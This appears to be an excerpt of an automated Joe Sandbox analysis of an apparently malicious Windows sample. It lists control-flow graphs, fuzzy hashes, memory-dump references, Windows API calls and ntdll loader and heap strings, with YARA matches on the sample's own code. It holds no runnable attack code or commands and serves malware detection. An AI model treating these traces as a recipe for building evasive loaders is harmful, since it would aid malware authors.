                                                                                                                                              • Instruction Fuzzy Hash: B8015EB5E0020DBBDF10DBE5DD42FDEB3789B54308F4081AAE90897240F675EB488BA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 66 19c35c0-19c35cc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                                                                                                                                              • Instruction ID: 3339c266c4420204e4cfa94d50dfe09dd73bfae8ac9d51ff37cc169ac7a629e5
                                                                                                                                              • Opcode Fuzzy Hash: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                                                                                                                                              • Instruction Fuzzy Hash: 6290023560561402D10071584518706505997D0201F65C411E0464568EC7958A5166A3

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 63 19c2b60-19c2b6c LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                                                                                                                                              • Instruction ID: 32b65fe00499e4ff81c3b0417a4166d98108297b3e27473672d9aa1a73bb1455
                                                                                                                                              • Opcode Fuzzy Hash: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                                                                                                                                              • Instruction Fuzzy Hash: 9090026520251003410571584418616805E97E0201B55C021E1054590EC52589916226

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 65 19c2df0-19c2dfc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                                                                                                                                              • Instruction ID: c08d561886b6c0464f8df0167ea70c49d75b589606419e154d2d0964525db4a7
                                                                                                                                              • Opcode Fuzzy Hash: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                                                                                                                                              • Instruction Fuzzy Hash: FE90023520151413D11171584508707405D97D0241F95C412E0464558ED6568A52A222

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 64 19c2c70-19c2c7c LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                                                                                                                                              • Instruction ID: ef6e9b01fee5c1c57a293d314e6ddcc7f04b09b9d885b6a3e199d36c37f05570
                                                                                                                                              • Opcode Fuzzy Hash: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                                                                                                                                              • Instruction Fuzzy Hash: BF90023520159802D1107158840874A405997D0301F59C411E4464658EC69589917222

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 42c283-42c2c7 call 4044a3 call 42d153 RtlFreeHeap
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2C2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: ^A
                                                                                                                                              • API String ID: 3298025750-3251803456
                                                                                                                                              • Opcode ID: f121dccc94ad6ae9892e7da17d262d91c94da44102dcf713e084470555319430
                                                                                                                                              • Instruction ID: 031bdd33b0932c11d549b83e8758480b0afc4f3c511cd97d2edf14014a52f87e
                                                                                                                                              • Opcode Fuzzy Hash: f121dccc94ad6ae9892e7da17d262d91c94da44102dcf713e084470555319430
                                                                                                                                              • Instruction Fuzzy Hash: 36E06DB12002047FCA14EE59DC45FAB37ACEFC5710F00401AFD08A7241D674B9218AB5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 17 417213-41723e 19 417240-417245 17->19 20 4171c2-4171ce call 42f2b3 17->20 21 4171d0 19->21 22 417248-417262 19->22 20->21 25 4171e0-4171f1 call 42d633 21->25 26 4171d2-4171d8 call 42f553 21->26 31 4171f3-417207 LdrLoadDll 25->31 32 41720a-41720d 25->32 29 4171dd 26->29 29->25 31->32
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417205
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              • Opcode ID: 9d6f419d53a89590297ed3a95b234f59a3b5c0924cd5972a0533f6ff042c346b
                                                                                                                                              • Instruction ID: 57dd96bee447288efc35d123e896fe7ee341ef6ce162d769f0fe48c38f332b28
                                                                                                                                              • Opcode Fuzzy Hash: 9d6f419d53a89590297ed3a95b234f59a3b5c0924cd5972a0533f6ff042c346b
                                                                                                                                              • Instruction Fuzzy Hash: 51113D76E00109BBCB10DAA5CC41FDAF778DF55354F044296E91957281EA31FB0A8BA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 49 42c233-42c274 call 4044a3 call 42d153 RtlAllocateHeap
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000104,?,0042437F,?,?,0042437F,?,00000104,?,0000B252), ref: 0042C26F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 71c9c18ba4f29dccef27266d91e5d9684fc24c9a03ce7cca5b57a564e86d0044
                                                                                                                                              • Instruction ID: 10d7fa9a1095ff3c565a96949568e6e081e19988bd9917dac7ddf5865f970d94
                                                                                                                                              • Opcode Fuzzy Hash: 71c9c18ba4f29dccef27266d91e5d9684fc24c9a03ce7cca5b57a564e86d0044
                                                                                                                                              • Instruction Fuzzy Hash: EEE06DB12002047FC610EE59EC42FAB77ACDFC5750F004019FA18A7281D674B9108AF8

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 54 42c2d3-42c30c call 4044a3 call 42d153 ExitProcess
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_x.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 0d67a48d802ad302c240b2e2dd38d72597bc3adea32aab243ac96f285e047312
                                                                                                                                              • Instruction ID: 52fdecfce6c72926522b73fd8c83a329ac4b6b92dd680b9d8913354de3f024f8
                                                                                                                                              • Opcode Fuzzy Hash: 0d67a48d802ad302c240b2e2dd38d72597bc3adea32aab243ac96f285e047312
                                                                                                                                              • Instruction Fuzzy Hash: 96E086316002147BD210EA6ADC01FDB775CDFC5764F00801AFA0C67281D775B91487F4

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 59 19c2c0a-19c2c0f 60 19c2c1f-19c2c26 LdrInitializeThunk 59->60 61 19c2c11-19c2c18 59->61
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                                                                                                                                              • Instruction ID: b6b13b121cc887ce72d467063fbec4da23604204b3673ea1207d1273ab7e5eb0
                                                                                                                                              • Opcode Fuzzy Hash: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                                                                                                                                              • Instruction Fuzzy Hash: 33B09B71D415D5C5DA11E764460C717795477D0701F15C065D2470641F4738C1D1E277
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                              • Opcode ID: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                                                                                                                                              • Instruction ID: 37d749f5caca1e2b47d3fcccef930c75c7e82d275f672e853a29d513f2c50aed
                                                                                                                                              • Opcode Fuzzy Hash: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                                                                                                                                              • Instruction Fuzzy Hash: 83929371604742AFE722CF18D884B6BB7E8BF84750F04492EFA98D7291D770E944CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                              • Opcode ID: 5618e87123f53f98924a3b09b7e55a64b6adc3f9caf64ed519481ce74eae5d91
                                                                                                                                              • Instruction ID: e15a66e63a7cfc6a66ef20375e416bec50730f2df07c9be1354dedd402caa8b7
                                                                                                                                              • Opcode Fuzzy Hash: 5618e87123f53f98924a3b09b7e55a64b6adc3f9caf64ed519481ce74eae5d91
                                                                                                                                              • Instruction Fuzzy Hash: 0912A070600642DFE726CF69C445BB6BBF1FF89714F198459F49A8B682E734E881CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                              • Opcode ID: 61c1ea39ff0e11eed654ad7438c84650817d9a20401abf436f8406f37ebbcd3b
                                                                                                                                              • Instruction ID: 8b99f22ec7206bf01a795e7d79e94602a8b769dbd3ace164cd27994c2458da61
                                                                                                                                              • Opcode Fuzzy Hash: 61c1ea39ff0e11eed654ad7438c84650817d9a20401abf436f8406f37ebbcd3b
                                                                                                                                              • Instruction Fuzzy Hash: 00B17B725083569FD721DF68C880A6BBBE8BFC8754F05492EF98DD7240D770D9488B92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                              • Opcode ID: c5fc3b4a37f1f44a06e7cceb465e6786a60861a55dd0b4c581550b9c543c5d46
                                                                                                                                              • Instruction ID: 253209e23ffc24eaaac130e9c0e0b2bf54b734bf01c024d1e4028740a02f4bad
                                                                                                                                              • Opcode Fuzzy Hash: c5fc3b4a37f1f44a06e7cceb465e6786a60861a55dd0b4c581550b9c543c5d46
                                                                                                                                              • Instruction Fuzzy Hash: 6AD1F672804312AFD721DB64C850B6BBBE8AFD4B18F44492DFA98A7154E770DD48C7E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                              • Opcode ID: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                                                                                                                                              • Instruction ID: 05e6bdf080efa810055a6d9e8321e5f12c5d40de61d60792208343e0a1fff95f
                                                                                                                                              • Opcode Fuzzy Hash: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                                                                                                                                              • Instruction Fuzzy Hash: 91D1DE36600686DFDB22DF68C940BAEBBF1FFC9714F188059F48A9B252C7349A41CB54
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 0197D2AF
                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 0197D196
                                                                                                                                              • @, xrefs: 0197D0FD
                                                                                                                                              • @, xrefs: 0197D313
                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0197D0CF
                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0197D262
                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0197D146
                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0197D2C3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                              • Opcode ID: f6c93a2b50b627924dc673dbf26ac8c44d93cac75d33288a6ba329efc5e32ac4
                                                                                                                                              • Instruction ID: fea9f80c534267ab3e12f666234f3b407ffb8701b0c04f1783d164018b762417
                                                                                                                                              • Opcode Fuzzy Hash: f6c93a2b50b627924dc673dbf26ac8c44d93cac75d33288a6ba329efc5e32ac4
                                                                                                                                              • Instruction Fuzzy Hash: C1A119719083469FE721DF65C444B6BBBE8BFC4725F00892EE99C97240E774D9488B93
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                              • Opcode ID: 87020ea86fb0eeff952b1b001841c15a7a0afd2c4d3ac14b1c8e5db2d36572d5
                                                                                                                                              • Instruction ID: 1d3c17acd4a0908378a27cfc455d7b3b20fb94b8a1098a5cad878ac4caca568c
                                                                                                                                              • Opcode Fuzzy Hash: 87020ea86fb0eeff952b1b001841c15a7a0afd2c4d3ac14b1c8e5db2d36572d5
                                                                                                                                              • Instruction Fuzzy Hash: 5042EF312087829FD715DF28C884B6ABBE9FF84714F08896DF4AE9B252D730D945CB52
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                              • Opcode ID: 54872df48a993532ba6ec0b5bf0dcae3599e78d41e066ccde87c3e9071b1f3ac
                                                                                                                                              • Instruction ID: 29d943b33c6f3acae7a58b1640610fe67df4b10dc8ac47248e0b0a921102dec4
                                                                                                                                              • Opcode Fuzzy Hash: 54872df48a993532ba6ec0b5bf0dcae3599e78d41e066ccde87c3e9071b1f3ac
                                                                                                                                              • Instruction Fuzzy Hash: 17C14B31A00216ABDF25CFACD885F7E7BA9EF95B00F044069DD0FAB291E7788944C391
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                              • Opcode ID: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                                                                                                                                              • Instruction ID: 0dceb77e734a829f4e04c83add54a97900ded4322b0398d0e1aabbf7c15416d4
                                                                                                                                              • Opcode Fuzzy Hash: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                                                                                                                                              • Instruction Fuzzy Hash: E5916D35B01715ABEB35DF18DD84FEA7BAABF90B25F04012CD60C6B281D778A902C791
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                              • API String ID: 0-1745908468
                                                                                                                                              • Opcode ID: cefeb505ee850a0da015c7420f8573f49db16fefa2a8bafd4ca5b05e0ed631ac
                                                                                                                                              • Instruction ID: e6331af4d4eebf8213f92b58e32a5c86106f2132de2bf3eb41f8d9b6e7f187f7
                                                                                                                                              • Opcode Fuzzy Hash: cefeb505ee850a0da015c7420f8573f49db16fefa2a8bafd4ca5b05e0ed631ac
                                                                                                                                              • Instruction Fuzzy Hash: 6D910332900691DFDB26DF6CC840AADFBF2FF99714F19801DE459AB261C7759941CB10
                                                                                                                                              Strings
                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019D99ED
                                                                                                                                              • LdrpInitShimEngine, xrefs: 019D99F4, 019D9A07, 019D9A30
                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 019D9A01
                                                                                                                                              • apphelp.dll, xrefs: 01976496
                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019D9A2A
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019D9A11, 019D9A3A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-204845295
                                                                                                                                              • Opcode ID: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                                                                                                                                              • Instruction ID: 6a928f8522de30c1ef636d3fe7b2a93600abd8dd765eb095c6051616943fdd3b
                                                                                                                                              • Opcode Fuzzy Hash: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                                                                                                                                              • Instruction Fuzzy Hash: 785190726087059BE721EF24C891FABB7E8EFC4648F01491DE58D9B1A0D630EA05CB93
                                                                                                                                              Strings
                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019F02BD
                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019F02E7
                                                                                                                                              • RTL: Re-Waiting, xrefs: 019F031E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                              • Opcode ID: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                                                                                                                                              • Instruction ID: 677dcfa0c51f10ecabb1c3bce3c072e1ee30d6c4e543997549c59f6141a64756
                                                                                                                                              • Opcode Fuzzy Hash: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                                                                                                                                              • Instruction Fuzzy Hash: 0EE1C0306047419FD725CF28C884B6ABBE9FF84314F540A1DF6A98B2D2D774D949CB92
                                                                                                                                              Strings
                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 019A527B
                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 019A5352
                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 019A542B
                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 019A5247
                                                                                                                                              • WindowsExcludedProcs, xrefs: 019A522A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                              • Opcode ID: 7632da2a581f6e58f8f61e4cb6174573be2b20da3cab283c399efb90740e5361
                                                                                                                                              • Instruction ID: 18bdc0c882ab2657feab643c75411006b31b75312ac3b23e3e72bb30e2956a89
                                                                                                                                              • Opcode Fuzzy Hash: 7632da2a581f6e58f8f61e4cb6174573be2b20da3cab283c399efb90740e5361
                                                                                                                                              • Instruction Fuzzy Hash: 3CF14B72E10219EBDF12DFA9C9449EEBBFDFF48610F55405AE909E7210E6709E048B90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3178619729
